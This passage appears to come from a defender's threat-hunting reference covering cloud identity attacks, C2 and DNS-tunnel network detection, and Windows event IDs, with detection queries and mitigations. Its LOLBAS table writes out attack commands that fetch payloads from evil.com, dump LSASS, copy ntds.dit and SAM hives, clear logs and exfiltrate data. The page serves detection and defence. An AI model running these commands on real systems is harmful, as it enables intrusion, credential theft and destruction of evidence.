event.dataset:"aws.cloudtrail" and user.id:ASIA* and event.provider:("iam.amazonaws.com" or "organizations.amazonaws.com")
AWS CLI (audit) Find instances still using IMDSv1 
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`].[InstanceId, MetadataOptions]' \
  --output table

๐Ÿ›ก๏ธ Mitigations

  • Enforce IMDSv2 on all EC2 instances (HttpTokens=required)
  • Launch templates must require IMDSv2
  • Set HttpPutResponseHopLimit=1 (blocks container workloads from reaching metadata)
  • GuardDuty finding: UnauthorizedAccess:IAMUser/InstanceCredentialExfiltrationOutsideAWS
  • VPC endpoints for AWS services โ€” detect metadata creds being used externally

๐Ÿ”ง Tools used by attackers / defenders

Pacu (ec2__enum_eips, iam__enum_permissions)SSRFmapmanual curl + SSRF primitive
T1078.004

Cross-Account AssumeRole Abuse

HIGH [MITRE]

Summary: Attackers abuse overly permissive trust policies โ€” or create new trust relationships โ€” to assume roles in other AWS accounts within an organization.

Why this matters

Most organizations have multiple AWS accounts with IAM roles that trust each other (e.g., 'prod-read-role' in prod is trusted by 'security-audit-role' in security account). Misconfigured trust policies (Principal: *, or overly broad conditions) let anyone with the role ARN assume the role. Attackers enumerate trust relationships and pivot through the account graph.

What to look for

`AssumeRole` events where the source account differs from the destination. `AssumeRole` with `externalId` mismatches. New role creations with wildcard principals. Cross-account activity from an account not in your organization.

KQL AssumeRole from an external AWS account (not in your organization) 
event.dataset:"aws.cloudtrail" and event.action:"AssumeRole"
-- Compare recipientAccountId vs userIdentity.accountId
-- Alert when source is not in org allow-list
KQL UpdateAssumeRolePolicy setting Principal to wildcard 
event.dataset:"aws.cloudtrail" and event.action:"UpdateAssumeRolePolicy" and aws.cloudtrail.request_parameters:*"Principal\":\"*\""*
KQL Role chaining โ€” one AssumeRole leading to another within minutes (privesc path) 
event.dataset:"aws.cloudtrail" and event.action:"AssumeRole"
-- Correlate: same originating user, multiple AssumeRole calls chained in 10min
-- Attack pattern: A -> B -> C -> admin

๐Ÿ›ก๏ธ Mitigations

  • All cross-account trust policies must require ExternalId condition
  • Use AWS Organization SCPs to restrict which accounts can assume which roles
  • IAM Access Analyzer External Access โ€” finds all resources shared externally
  • Deny UpdateAssumeRolePolicy via SCP except from dedicated admin roles
  • Alert on AssumeRole chains (3+ role assumptions in a session)

๐Ÿ”ง Tools used by attackers / defenders

PacuPMapper (privilege mapping across accounts)awspx

๐Ÿ”ท Azure / M365 / Entra ID 5 cards

Microsoft cloud identity & productivity attack patterns โ€” increasingly the target #1 in real intrusions. Sign-in anomalies, OAuth device-code phishing (the technique that bypasses MFA), illicit consent grants, Entra ID privilege escalation, and BEC mailbox forwarding rules. All queries written in Sentinel KQL syntax with Azure-specific log table names.

T1078.004

Entra ID Sign-in Anomalies

HIGH [MITRE]

Summary: Detect impossible travel, unfamiliar location, and atypical sign-in patterns from Entra ID sign-in logs.

Why this matters

Once an attacker has credentials (phishing, infostealer, credential stuffing), they authenticate to M365 from their own infrastructure. Entra ID's own 'Risky Sign-ins' feature catches obvious cases, but you can supplement with custom KQL for your specific environment โ€” e.g., authentications from countries you don't operate in.

What to look for

Successful sign-ins where source IP country differs from user's normal pattern, sign-ins at unusual hours for that user, authentications from datacenter ASNs (OVH, DigitalOcean, M247) which are often attacker infrastructure, simultaneous sign-ins from distant locations (impossible travel).

KQL (Sentinel) Successful sign-in from a country never before seen for the user 
SigninLogs
| where ResultType == 0
| summarize Countries = make_set(LocationDetails.countryOrRegion), arg_max(TimeGenerated, *) by UserPrincipalName
| where array_length(Countries) > 1
| where LocationDetails.countryOrRegion !in (baseline_countries)
KQL (Sentinel) Sign-in from known hosting/VPN ASN โ€” attacker infrastructure indicator 
SigninLogs
| where ResultType == 0
| where AutonomousSystemNumber in (16276, 14061, 24940, 9009)  // OVH, DigitalOcean, Hetzner, M247
| project TimeGenerated, UserPrincipalName, IPAddress, AutonomousSystemNumber, AppDisplayName
KQL (Sentinel) Impossible travel โ€” same user, two IPs in far-apart locations within 1 hour 
SigninLogs
| where ResultType == 0
| summarize locations = make_list(strcat(tostring(LocationDetails.countryOrRegion), ":", IPAddress), 10) by UserPrincipalName, bin(TimeGenerated, 1h)
| where array_length(set_difference(locations, dynamic([]))) > 1

๐Ÿ›ก๏ธ Mitigations

  • Enable Entra ID Protection (P2 license) โ€” automated risky sign-in detection
  • Require MFA with Conditional Access โ€” block legacy authentication entirely
  • Block sign-ins from countries you don't operate in (CA named locations)
  • Require compliant or hybrid-joined devices for privileged roles
  • Monitor Risky Users report weekly

๐Ÿ”ง Tools used by attackers / defenders

AADInternalsROADtoolsevilginx2 (attacker)Microsoft Entra ID Protection (defender)
T1566.002

Device Code Phishing

HIGH [MITRE]

Summary: Attackers initiate a device code flow on their own device, trick the victim into entering the code, receive valid tokens that bypass MFA entirely.

Why this matters

OAuth 2.0 device code flow is designed for input-constrained devices (smart TVs, IoT). The attacker initiates the flow, sends the victim a legitimate Microsoft URL (microsoft.com/devicelogin) along with a code. The victim logs in normally, approves the 'device', and the attacker receives a valid access+refresh token. MFA is completed by the victim โ€” tokens are given to the attacker. This is devastating because the phish looks entirely legitimate (real Microsoft URL, real login flow).

What to look for

Sign-in logs where `AuthenticationProtocol = deviceCode`. Token activity from Azure resource types that the user doesn't normally access. Refresh token usage from IP addresses that differ from the initial device code sign-in.

KQL (Sentinel) Device code authentication โ€” review ALL of these 
SigninLogs
| where AuthenticationProtocol == "deviceCode"
| project TimeGenerated, UserPrincipalName, IPAddress, AppDisplayName, ResourceDisplayName
| sort by TimeGenerated desc
KQL (Sentinel) Device code sign-in followed by token use from different IP 
let deviceCode = SigninLogs | where AuthenticationProtocol == "deviceCode" | project UserPrincipalName, OriginalIP = IPAddress, DeviceCodeTime = TimeGenerated;
SigninLogs
| where AuthenticationProtocol != "deviceCode"
| join kind=inner deviceCode on UserPrincipalName
| where IPAddress != OriginalIP
| where TimeGenerated between (DeviceCodeTime .. DeviceCodeTime + 24h)

๐Ÿ›ก๏ธ Mitigations

  • Conditional Access: block device code flow entirely unless business-justified
  • For organizations that must allow it: restrict to specific apps and trusted locations
  • User awareness training specifically for device code phishing (it bypasses 'never click links' advice)
  • Deploy token protection via Conditional Access (preview feature as of late 2024)

๐Ÿ”ง Tools used by attackers / defenders

TokenTacticsROADtools roadtxAADInternals Invoke-AADIntPhishing
T1528

Illicit OAuth Consent Grant

CRITICAL [MITRE]

Summary: Attacker tricks user into granting OAuth permissions to a malicious app โ€” app now reads mail, files, calendars without needing the user's password.

Why this matters

This bypasses password changes, MFA, and device resets. Once a user approves (consents to) a malicious OAuth app with Mail.Read + Files.Read, the app retains access via refresh tokens even if the user changes their password. The attacker never sees the password โ€” they just have an ongoing API access grant. Rebuilding trust requires revoking the app grant, which many incident responders forget to do.

What to look for

Audit events for `Consent to application`. New enterprise apps registered. Apps with permissions like `Mail.ReadWrite`, `Files.ReadWrite.All`, `offline_access` (refresh token), `Directory.Read.All`. App names that mimic legitimate ones (e.g., '0ffice365 Login' with a zero).

KQL (Sentinel) User consented to an OAuth app โ€” review permissions granted 
AuditLogs
| where OperationName == "Consent to application"
| extend AppName = tostring(TargetResources[0].displayName)
| extend Permissions = tostring(TargetResources[0].modifiedProperties)
| project TimeGenerated, InitiatedBy, AppName, Permissions
| where Permissions has_any ("Mail.Read", "Mail.ReadWrite", "Files.Read", "Files.ReadWrite", "Directory.Read")
KQL (Sentinel) New service principal created with suspicious reply URL 
AuditLogs
| where OperationName == "Add service principal"
| extend AppName = tostring(TargetResources[0].displayName)
| extend ReplyUrls = tostring(TargetResources[0].modifiedProperties)
| where ReplyUrls has_any ("ngrok", "localhost", "heroku", "azurewebsites")

๐Ÿ›ก๏ธ Mitigations

  • DISABLE user consent to apps (Entra โ†’ Enterprise apps โ†’ Consent and permissions โ†’ Do not allow user consent)
  • Implement admin consent workflow for all OAuth app grants
  • Use 'Verified Publisher' requirement on consent policies
  • Monitor for new enterprise app registrations daily
  • Quarterly review of all consented apps โ€” revoke unused/suspicious ones

๐Ÿ”ง Tools used by attackers / defenders

365-Stealer (attacker)Illicit consent grant attack simulatorMicrosoft MCAS/Defender for Cloud Apps (defender)
T1098.003

Entra ID Privilege Escalation

CRITICAL [MITRE]

Summary: Adding users to privileged roles (Global Admin, Privileged Role Admin, Application Admin), creating backdoor admins.

Why this matters

Once initial access is obtained in M365, the attacker's goal is elevating to Global Admin or a role that effectively grants it (Privileged Role Administrator, Application Administrator, Cloud Application Administrator โ€” all have paths to GA). Any role assignment to these should be treated as critical.

What to look for

Audit logs for `Add member to role` or `Add eligible member to role` targeting high-privilege roles. Creation of new Global Admins. Modification of role-assignable groups.

KQL (Sentinel) Any addition to a sensitive Entra ID role 
AuditLogs
| where OperationName has_any ("Add member to role", "Add eligible member to role")
| extend RoleName = tostring(TargetResources[0].modifiedProperties[1].newValue)
| where RoleName has_any ("Global Administrator", "Privileged Role Administrator", "Application Administrator", "Cloud Application Administrator", "Privileged Authentication Administrator", "User Administrator", "Exchange Administrator", "SharePoint Administrator")
| project TimeGenerated, InitiatedBy, TargetResource = TargetResources[0].userPrincipalName, RoleName
KQL (Sentinel) Creation of new app registration with high-privilege API permissions 
AuditLogs
| where OperationName == "Update application"
| where TargetResources contains "RequiredResourceAccess"
| extend Permissions = tostring(TargetResources[0].modifiedProperties)
| where Permissions has_any ("Directory.ReadWrite.All", "User.ReadWrite.All", "RoleManagement.ReadWrite.Directory")

๐Ÿ›ก๏ธ Mitigations

  • Use Privileged Identity Management (PIM) โ€” just-in-time role activation, not permanent
  • Require MFA and approval for GA activation
  • Hard-cap Global Admins at 3-5 emergency accounts
  • Alert on every GA addition (should be very rare)
  • Review role assignments quarterly

๐Ÿ”ง Tools used by attackers / defenders

ROADtoolsAzureHoundStormspotter
T1114.003

Malicious Mailbox Forwarding Rules

HIGH [MITRE]

Summary: Attackers create inbox rules that forward incoming mail to an external address โ€” persistent, invisible data theft that survives password resets.

Why this matters

This is the #1 BEC (Business Email Compromise) technique. After phishing a finance team member, attacker creates a rule: 'Forward any email containing "invoice" or "wire transfer" to attacker@example.com, then mark as read, then delete from inbox.' The victim never sees the replies. Auto-forwarding to external addresses is disabled by default in M365 as of 2021, but rules can still be abused if scoped internally or if the org has exceptions.

What to look for

`New-InboxRule` or `Set-InboxRule` events in Exchange. Rules with `ForwardTo`, `ForwardAsAttachmentTo`, or `RedirectTo` set to external addresses. Rules with `DeleteMessage` or `MarkAsRead` flags that hide the forwarded mail. Suspicious subject filters like 'invoice', 'payment', 'wire', 'HR'.

KQL (Sentinel) New inbox rule with external forwarding 
OfficeActivity
| where Operation in ("New-InboxRule", "Set-InboxRule", "UpdateInboxRules")
| extend RuleParams = parse_json(Parameters)
| extend ForwardTo = tostring(RuleParams[0].Value), ForwardAsAttachmentTo = tostring(RuleParams[1].Value), DeleteMessage = tostring(RuleParams[2].Value)
| where isnotempty(ForwardTo) or isnotempty(ForwardAsAttachmentTo)
KQL (Sentinel) Inbox rules with suspicious subject keywords (BEC pattern) 
OfficeActivity
| where Operation contains "InboxRule"
| extend RuleBody = tostring(Parameters)
| where RuleBody has_any ("invoice", "payment", "wire", "bank", "ACH", "HR", "payroll", "confidential")
| where RuleBody has_any ("Delete", "MarkAsRead", "MoveToFolder")
PowerShell (audit) Enumerate all inbox rules across the tenant 
Connect-ExchangeOnline
Get-Mailbox -ResultSize Unlimited | ForEach-Object {
    Get-InboxRule -Mailbox $_.UserPrincipalName | Where-Object {
        $_.ForwardTo -or $_.ForwardAsAttachmentTo -or $_.RedirectTo
    } | Select-Object @{N="Mailbox";E={$_.Mailbox}}, Name, ForwardTo, RedirectTo, DeleteMessage
} | Export-Csv -Path "inbox_forwarding_rules.csv"

๐Ÿ›ก๏ธ Mitigations

  • Default-deny external auto-forwarding (Exchange Online policy, Microsoft made this default in 2021)
  • Alert on ANY new inbox rule with ForwardTo/RedirectTo property
  • Enable Mailbox Auditing (should be on by default for E5)
  • For privileged users (finance, HR, executives): require admin approval for any new rule
  • Enable Defender for Office 365 โ€” catches forwarding rules as part of anti-phishing policy

๐Ÿ”ง Tools used by attackers / defenders

ROADtools roadreconMicrosoft Graph (attacker: msgraph mailFolders/inbox/messageRules)Defender for O365 (defender)

โš™๏ธ LOLBAS Reference 24 binaries

Living Off the Land Binaries And Scripts โ€” built-in Windows binaries adversaries weaponize to avoid dropping malware. Filterable, searchable table with category, abuse description, example command, and detection KQL. Each row links to the full lolbas-project.io entry. Use the search box to find specific binaries or attack patterns.

24 of 24
Binary Category Abuse Example Command Detection KQL
certutil.exe Download Download remote file certutil.exe -urlcache -split -f http://evil.com/pay.exe pay.exe process.name:"certutil.exe" and process.command_line:(*"-urlcache"* or *"-f -split"*) โ†—
bitsadmin.exe Download BITS transfer of remote file bitsadmin /transfer job /download http://evil.com/pay.exe C:\temp\pay.exe process.name:"bitsadmin.exe" and process.command_line:*"/transfer"* โ†—
curl.exe Download Download file (Win10 1803+) curl -o pay.exe http://evil.com/pay.exe process.name:"curl.exe" and process.command_line:(*"-o "* or *"--output "*) โ†—
powershell.exe Download Net.WebClient DownloadString powershell -c (New-Object Net.WebClient).DownloadString('http://evil.com/p') process.name:"powershell.exe" and process.command_line:(*"DownloadString"* or *"DownloadFile"* or *"Invoke-WebRequest"*) โ†—
mshta.exe Download Execute HTA from URL mshta.exe http://evil.com/pay.hta process.name:"mshta.exe" and process.command_line:(*http* or *https*) โ†—
regsvr32.exe Execute Squiblydoo โ€” execute scriptlet regsvr32 /s /n /u /i:http://evil.com/x.sct scrobj.dll process.name:"regsvr32.exe" and process.command_line:(*"scrobj.dll"* or *"/i:http"*) โ†—
rundll32.exe Execute Run arbitrary DLL export rundll32.exe shell32.dll,ShellExec_RunDLL calc.exe process.name:"rundll32.exe" and process.command_line:(*"javascript:"* or *"ShellExec"* or *"LaunchINFSection"*) โ†—
installutil.exe Execute Install & execute .NET assembly InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe process.name:"InstallUtil.exe" โ†—
msbuild.exe Execute Compile & run C# from XML proj msbuild.exe evil.csproj process.name:"MSBuild.exe" and not process.parent.name:("devenv.exe" or "VsDebugConsole.exe") โ†—
mavinject.exe Execute Inject DLL into process mavinject.exe <PID> /INJECTRUNNING evil.dll process.name:"mavinject.exe" and process.command_line:*"/INJECTRUNNING"* โ†—
cmstp.exe Execute / UAC Bypass Bypass UAC via INF cmstp.exe /s evil.inf process.name:"cmstp.exe" and process.command_line:*".inf"* โ†—
comsvcs.dll Credential Access Dump LSASS via MiniDump export rundll32.exe comsvcs.dll, MiniDump <PID> C:\temp\dump.dmp full process.command_line:*"comsvcs.dll"* and process.command_line:*"MiniDump"* โ†—
ntdsutil.exe Credential Access Extract ntds.dit from DC ntdsutil.exe "ac i ntds" "ifm" "create full C:\temp" q q process.name:"ntdsutil.exe" and process.command_line:(*"ifm"* or *"create full"*) โ†—
vssadmin.exe Credential Access Shadow copy โ†’ steal SAM/SYSTEM vssadmin create shadow /for=C: process.name:"vssadmin.exe" and process.command_line:*"create shadow"* โ†—
wevtutil.exe Defense Evasion Clear event logs wevtutil.exe cl Security process.name:"wevtutil.exe" and process.command_line:*"cl "* โ†—
fsutil.exe Defense Evasion Disable USN journal (anti-forensics) fsutil usn deletejournal /d C: process.name:"fsutil.exe" and process.command_line:*"deletejournal"* โ†—
attrib.exe Defense Evasion Set hidden/system attributes attrib +h +s +r evil.exe process.name:"attrib.exe" and process.command_line:(*"+h"* and *"+s"*) โ†—
esentutl.exe Data Exfil Copy locked files (ntds.dit) esentutl.exe /y C:\Windows\NTDS\ntds.dit /d C:\temp\ntds.dit process.name:"esentutl.exe" and process.command_line:(*"/y"* and *"/d"*) โ†—
finger.exe Exfiltration / C2 Exfil data via FINGER protocol finger user@evil.com process.name:"finger.exe" โ†—
makecab.exe Archive Archive files for exfiltration makecab.exe C:\stolen.txt C:\stolen.cab process.name:"makecab.exe" and process.parent.name:("cmd.exe" or "powershell.exe") โ†—
xcopy.exe Lateral Copy to admin share xcopy.exe payload.exe \\VICTIM\C$\Windows\Temp\ process.name:"xcopy.exe" and process.command_line:(*"\\\\"* and (*"C$"* or *"ADMIN$"*)) โ†—
reg.exe Credential / Persistence Export SAM/SYSTEM/SECURITY hives reg save HKLM\SAM C:\temp\sam.hive process.name:"reg.exe" and process.command_line:(*"save"* and (*"HKLM\\SAM"* or *"HKLM\\SYSTEM"* or *"HKLM\\SECURITY"*)) โ†—
wmic.exe Execute / Lateral Remote process creation wmic /node:target process call create "cmd.exe /c calc" process.name:"wmic.exe" and process.command_line:(*"/node:"* and *"process call create"*) โ†—
pcalua.exe Execute Run arbitrary command (compat) pcalua.exe -a evil.exe process.name:"pcalua.exe" and process.command_line:*"-a"* โ†—
No binaries match your search.

๐Ÿ•ธ๏ธ Network Hunting Depth 4 cards

Advanced network-layer detections that work against encrypted traffic without requiring TLS interception. JA3/JA4 TLS fingerprinting, Cobalt Strike/Sliver beacon detection via periodicity analysis, DNS tunneling pattern detection, and broader Encrypted Traffic Analysis. These are the techniques modern SOCs use when they can't break the crypto.

T1071.001

JA3/JA4 TLS Client Fingerprinting

MEDIUM [MITRE]

Summary: Use JA3 (legacy) or JA4 (modern) TLS client fingerprints to identify malware families, C2 frameworks, and tooling by how they speak TLS โ€” even when traffic is encrypted.

Why this matters

You cannot read encrypted payloads, but you CAN read the unencrypted TLS ClientHello. JA3 hashes the ClientHello fields (version, cipher suites, extensions, elliptic curves, EC formats) into a 32-char MD5. Cobalt Strike, Sliver, Metasploit, and most malware families produce recognizable JA3/JA4 values because they use specific TLS libraries or configurations that differ from normal browsers. JA4 (John Althouse, 2023) is the evolution โ€” more granular, includes ALPN and SNI domain, and is human-readable (e.g., t13d1516h2_8daaf6152771_02713d6af862).

What to look for

TLS connections with JA3/JA4 hashes on public blocklists (abuse.ch, CrowdStrike, FoxIO). Internal hosts generating the same uncommon JA3 to multiple external IPs (malware pattern). A single JA3 appearing from many internal hosts to one external IP (tool being distributed internally).

KQL (Zeek/Arkime) Known Cobalt Strike JA3 hashes โ€” from abuse.ch JA3 database 
event.dataset:(zeek.ssl or arkime.session) and tls.client.ja3:("72a589da586844d7f0818ce684948eea" or "37f463bf4616ecd445d4a1937da06e19" or "a0e9f5d64349fb13191bc781f81f42e1")
KQL (Zeek) JA4 hunt โ€” unusual TLS fingerprint from a single host to many destinations 
event.dataset:zeek.ssl and tls.client.ja4:*
-- Aggregate: unique tls.client.ja4 by source.ip, count distinct destination.ip
-- Alert when a rare JA4 connects to 10+ destinations from one host
Suricata Sliver default JA3 signature 
alert tls any any -> any any (msg:"Sliver Default JA3 Observed";
    ja3.hash; content:"e76d33fd41f5c11f7a8d4e9ebd0a3fa9";
    classtype:command-and-control; sid:9200001; rev:1;)

๐Ÿ›ก๏ธ Mitigations

  • Deploy Zeek or Suricata with JA3/JA4 logging (enabled by default in modern versions)
  • Subscribe to JA3/JA4 threat feeds (abuse.ch SSLBL, CrowdStrike, FoxIO)
  • Log TLS fingerprints in Elastic/Splunk โ€” retain 90+ days for retroactive hunt
  • For high-assurance: combine JA3 with destination IP geolocation + ASN rarity

๐Ÿ”ง Tools used by attackers / defenders

Zeek (ssl.log)Suricata (TLS.JA3)ArkimeJA4+ (FoxIO)
T1071

Cobalt Strike / Sliver Beacon Detection

CRITICAL [MITRE]

Summary: Beacon detection by looking for periodic callbacks with jitter โ€” the core behavior of every C2 framework.

Why this matters

All C2 frameworks (Cobalt Strike, Sliver, Havoc, Mythic, Metasploit) operate on beacons: the compromised host periodically calls home to check for commands. Default sleep intervals (60s, 5m) combined with jitter (random offset) produce a distinctive statistical signature โ€” connections at roughly regular intervals to the same destination. You can detect this even over HTTPS without breaking TLS.

What to look for

A single source IP connecting to a single destination with consistent intervals (30s-5min being most common). Low standard deviation in connection timing (jitter < 20% of interval). Small, consistent request sizes (beacon check-in โ‰ˆ 200-1KB). TLS connections to IPs without matching DNS queries.

KQL (network logs) Periodicity โ€” 50+ connections in 1hr from one host to one destination at regular intervals 
event.dataset:(zeek.conn or network.*) and not destination.ip:(10.0.0.0/8 or 192.168.0.0/16 or 172.16.0.0/12)
-- Aggregate: source.ip + destination.ip, count over 1hr windows
-- Sub-aggregate: stddev(time_delta) for periodicity
-- Alert when count > 50 AND stddev < 20%
KQL Outbound HTTPS with no prior DNS query for destination IP (direct IP beacon) 
event.dataset:zeek.ssl and destination.port:443
-- Left-anti-join against zeek.dns for the same destination.ip in prior 5min
-- Alert on destination.ip with no DNS history
Suricata Cobalt Strike default HTTP profile (pre-malleable) 
alert http any any -> any any (msg:"Cobalt Strike Default HTTP GET Beacon";
    flow:established,to_server; http.method; content:"GET";
    http.uri; pcre:"/^\/[a-zA-Z0-9]{4}$/";
    http.user_agent; content:"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1;";
    classtype:trojan-activity; sid:9200002; rev:1;)

๐Ÿ›ก๏ธ Mitigations

  • Deploy a C2 beacon analyzer โ€” RITA (Real Intelligence Threat Analytics) from Black Hills
  • Monitor outbound HTTPS to new/low-reputation IPs
  • Alert on encrypted connections without prior DNS lookup
  • Network egress filtering โ€” allowlist approved outbound destinations where feasible
  • EDR with memory scanning โ€” most beacons live in memory and are catchable there

๐Ÿ”ง Tools used by attackers / defenders

RITAZeekSuricataCobaltStrikeParser (attacker tooling analysis)
T1071.004

DNS Tunneling (Advanced Detection)

HIGH [MITRE]

Summary: Detect data exfiltration and C2 hidden inside DNS queries โ€” encoded in subdomains, TXT records, or raw query volumes.

Why this matters

DNS tunneling works because DNS is allowed outbound from virtually everywhere. Attackers encode data into subdomain labels (a.b.c.evil.com where a/b/c are base32-encoded data) and read responses from TXT records. Tools like Iodine, dnscat2, and DNSStager do this transparently. Legitimate DNS queries are short, targeted, and reuse the same domains. Tunneling creates long queries with high entropy and thousands of unique subdomains under one parent domain.

What to look for

Unusually long subdomain labels (>40 chars). High entropy in subdomain (close to random). Thousands of unique subdomains queried under one parent domain in short time. High rate of TXT record queries. Non-resolving queries with NXDOMAIN responses in large volume.

KQL (DNS logs) Subdomains > 40 characters โ€” near-certain tunneling 
event.dataset:zeek.dns and dns.question.name:/[a-zA-Z0-9+\/=]{40,}\..*/
KQL Unique subdomain count per parent domain per host (tunneling pattern) 
event.dataset:zeek.dns
-- Aggregate: group by source.ip + registered_domain
-- Count distinct dns.question.name over 1hr
-- Alert when count > 100
KQL TXT record query rate per host (C2-over-DNS signature) 
event.dataset:zeek.dns and dns.question.type:"TXT"
-- Aggregate by source.ip over 5min
-- Alert when TXT queries > 50 in window
Suricata Iodine DNS tunnel โ€” known magic string in query 
alert dns any any -> any any (msg:"Iodine DNS Tunnel Handshake";
    dns.query; content:"|76 6f 69|"; depth:3;
    classtype:command-and-control; sid:9200003; rev:1;)

๐Ÿ›ก๏ธ Mitigations

  • Deploy DNS RPZ (Response Policy Zone) โ€” blocks known tunneling domains
  • Rate-limit DNS queries per source (anything >100/min per host is suspicious)
  • Block external DNS resolvers โ€” force all DNS through internal resolvers with logging
  • Monitor TXT record query volume โ€” most legitimate orgs have very little
  • Deploy DNSSEC validation + Shannon entropy scoring on resolved hostnames

๐Ÿ”ง Tools used by attackers / defenders

ZeekSuricata DNSSplunk DNSHunterSIE (Farsight)Iodine/dnscat2 (attacker)
T1573

Encrypted Traffic Analysis (ETA)

MEDIUM [MITRE]

Summary: Hunt threats in encrypted traffic WITHOUT decryption โ€” using metadata patterns, flow features, and behavioral analysis.

Why this matters

Most modern malware uses TLS. Breaking TLS at scale is expensive and privacy-invasive. ETA works by analyzing features that are visible in encrypted streams: packet sizes, timings, SNI, TLS fingerprints, certificate properties. Combined, these features produce statistical signatures distinct enough to identify C2, data exfiltration, and malware even when payloads are opaque.

What to look for

Self-signed certificates to non-internal destinations. Certificates issued by rare/unknown CAs. Certificates with obviously-fake organization names (e.g., 'CN=Microsoft Corp' on a non-Microsoft IP). Mismatch between SNI and certificate subject. Short-lived certificates (<30d) to destinations you don't recognize.

KQL (Zeek x509/ssl) Self-signed certificates on external connections 
event.dataset:zeek.x509 and tls.server.x509.issuer.common_name == tls.server.x509.subject.common_name and not destination.ip:(10.0.0.0/8 or 192.168.0.0/16 or 172.16.0.0/12)
KQL Let's Encrypt certificates for recently-registered domains (malware staging pattern) 
event.dataset:zeek.x509 and tls.server.x509.issuer.organization:"Let\'s Encrypt"
-- Enrich destination.domain with domain registration date from whois
-- Alert when domain is less than 30 days old
KQL SNI/subject CN mismatch โ€” indicator of certificate spoofing or MITM 
event.dataset:zeek.ssl and tls.client.server_name:* and tls.server.x509.subject.common_name:*
-- Alert when server_name != subject.common_name AND not subject.subject_alt_name:server_name

๐Ÿ›ก๏ธ Mitigations

  • Deploy encrypted traffic classification โ€” Cisco ETA, Darktrace, Vectra AI
  • Inline TLS inspection for high-risk categories (uncategorized, newly-registered domains)
  • Certificate transparency monitoring โ€” detect unauthorized certs issued for your domains
  • Baseline typical certificate issuers per user/department โ€” alert on outliers

๐Ÿ”ง Tools used by attackers / defenders

ZeekCisco ETADarktraceCorelightSplunk Stream

๐Ÿ“‹ Windows Event ID + Sysmon Reference 48 events

Searchable reference of 48 critical Event IDs across Windows Security, System, PowerShell Operational, and Sysmon logs. Each entry includes what the event means, what to hunt for in it, key fields for queries, and severity baseline. Filter by source or category, or search any field.

48 of 48
EID Source Name Category What it means What to hunt for Key Fields Severity
4624 Security Successful Logon Authentication An account successfully logged on to the system. LogonType 10 (RDP), LogonType 3 (Network/SMB) for privileged accounts. NTLM authentications using high-privilege accounts. LogonGuid of all zeros (Pass-the-Hash indicator). TargetUserName, LogonType, IpAddress, AuthenticationPackageName, LogonProcessName, LogonGuid Info
4625 Security Failed Logon Authentication An account failed to log on. Status code reveals reason. Bursts (10+ failures in short window) = brute force. Same source IP failing on multiple usernames = password spray. Status 0xC0000064 = bad username, 0xC000006A = bad password. TargetUserName, IpAddress, FailureReason, Status, SubStatus Low
4634 Security Logoff Authentication An account logged off. Pair with 4624 to compute session duration. Very short admin sessions (<60s) can indicate scripted credential validation. TargetUserName, LogonType, LogonId Info
4648 Security Logon Using Explicit Credentials Authentication Logon initiated using credentials different from the current user (e.g., runas, wmic /user:). User A explicitly using User B's credentials โ€” common in lateral movement. Service accounts being used interactively. SubjectUserName, TargetUserName, TargetServerName, ProcessName Medium
4662 Security AD Object Operation AD Activity Operation performed on an Active Directory object โ€” including replication. Replication GUIDs (1131f6aa, 1131f6ad, 89e95b76) from non-DC accounts = DCSync attack. Property writes to high-value objects. Properties, ObjectName, AccessMask, SubjectUserName Medium
4663 Security Object Access Attempted File/Object Access An attempt was made to access an object (typically file system). Access to sensitive files (SAM, SYSTEM, ntds.dit). Bulk reads of share data prior to exfiltration. ObjectName, AccessMask, ProcessName, SubjectUserName Low
4670 Security Permissions on Object Changed File/Object Access Permissions on an object were changed. ACL modifications on AD objects (combined with 5136). Permission grants on sensitive registry keys or files. ObjectName, OldSd, NewSd, SubjectUserName Medium
4672 Security Special Privileges Assigned Privilege Use Special privileges (admin-equivalent) assigned to a new logon. Indicates an admin/SYSTEM logon. Pair with 4624 to identify privileged sessions for tracking. SubjectUserName, PrivilegeList Info
4688 Security Process Creation Process Activity A new process was created. Suspicious process lineage (winword โ†’ cmd). LOLBin abuse. Encoded PowerShell. Requires audit policy: 'Audit Process Creation' enabled, optionally 'Include command line in process creation events' GPO. ProcessName, CommandLine, ParentProcessName, SubjectUserName Info (high-volume)
4697 Security Service Installed Persistence A service was installed in the system. Services with paths in user-writable directories (Temp, Public, AppData). Service names like PSEXESVC, PAExec โ€” lateral movement indicators. ServiceName, ServiceFileName, ServiceType, ServiceStartType Medium
4698 Security Scheduled Task Created Persistence A scheduled task was created. Tasks created from non-admin processes. Tasks with generic names (Updater, SystemCheck). Tasks running PowerShell with encoded commands. TaskName, TaskContent, SubjectUserName Medium
4699 Security Scheduled Task Deleted Persistence A scheduled task was deleted. Mass task deletions (potentially malware cleanup). Deletion of legitimate security/monitoring tasks. TaskName, SubjectUserName Low
4720 Security User Account Created Account Management A user account was created. Accounts created outside business hours. Accounts with names mimicking system accounts (svc_admin, helpdesk_svc). TargetUserName, SubjectUserName Medium
4724 Security Password Reset by Admin Account Management An attempt was made to reset an account's password. Password resets on privileged accounts (Domain Admins, krbtgt). Resets from non-admin sources. TargetUserName, SubjectUserName Medium
4728 Security Member Added to Security-Enabled Global Group Account Management A user was added to a global security group. Additions to Domain Admins, Enterprise Admins, Schema Admins, Account Operators groups. Additions outside change windows. MemberName, TargetUserName, SubjectUserName High
4732 Security Member Added to Security-Enabled Local Group Account Management A user was added to a local security group. Additions to local Administrators group on workstations/servers. Service accounts being added to admin groups. MemberName, TargetUserName, SubjectUserName High
4738 Security User Account Changed Account Management A user account attribute was changed. UserAccountControl flag changes โ€” DONT_REQ_PREAUTH (4194304) enables AS-REP Roasting. PASSWORD_NOT_REQUIRED set on accounts. TargetUserName, UserAccountControl, SubjectUserName Medium
4756 Security Member Added to Security-Enabled Universal Group Account Management A user was added to a universal security group. Additions to Enterprise Admins (universal scope). Cross-domain group changes. MemberName, TargetUserName, SubjectUserName High
4768 Security Kerberos TGT Requested Kerberos A Kerberos authentication ticket (TGT) was requested. PreAuthType=0 (no pre-auth) = AS-REP Roasting. RC4 encryption type with PreAuthType=0 = high-fidelity attack indicator. TargetUserName, TicketEncryptionType, PreAuthType, IpAddress Info (volume)
4769 Security Kerberos Service Ticket Requested Kerberos A Kerberos service ticket (TGS) was requested. TicketEncryptionType 0x17 (RC4) with TicketOptions 0x40810000 = Kerberoasting. Bursts of TGS requests for many SPNs from one user. TargetUserName, ServiceName, TicketEncryptionType, IpAddress Info (volume)
